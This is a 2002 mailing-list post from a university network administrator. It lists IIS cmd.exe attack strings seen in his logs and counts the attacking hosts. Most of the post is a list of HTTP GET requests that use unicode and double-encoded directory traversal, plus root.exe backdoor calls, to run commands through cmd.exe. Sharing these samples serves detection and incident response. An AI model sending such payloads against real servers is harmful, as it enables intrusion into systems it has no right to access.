IIS cmd.exe attack strings

Mike Iglesias iglesias at draco.acs.uci.edu
Tue Jun 11 15:57:16 GMT 2002


Below you'll find a list of the IIS cmd.exe attack strings that we've seen
over the last couple of days.

Some of the attacks ended in "dir+c:/" instead of "dir+c:\"; where the
ones ending in "/" were a duplicate of the one ending in "\", I removed
the one ending in "/".  Some have no drive/directory spec.

We are seeing some where one attacker will attack a few thousand hosts here,
and others where one attacker will attack one or two hosts here and then
go away.

Over the last couple of days, ~600 different systems have tried
cmd.exe exploits against systems here.  It looks like the attack
program may have around 25-30 different attacks to try, but it's hard
to tell for sure (I'm going off the of the number of tries one
attacker tried against one system here).


Mike Iglesias                          Internet:    iglesias at draco.acs.uci.edu
University of California, Irvine       phone:       949-824-6926
Network & Academic Computing Services  FAX:         949-824-2069

GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
GET /MSADC/root.exe?/c+dir 
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
GET /_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /c/winnt/system32/cmd.exe?/c+dir 
GET /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/ 
GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/ 
GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:/ 
GET /d/winnt/system32/cmd.exe?/c+dir 
GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
GET /msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
GET /msdac/root.exe?/c+dir+c:\
GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:/ 
GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%255c../winnt/system32/cmd.exe?\c+dir+c:\inetpub\scripts 
GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
GET /scripts/root.exe?/c+dir+c:\



More information about the unisog mailing list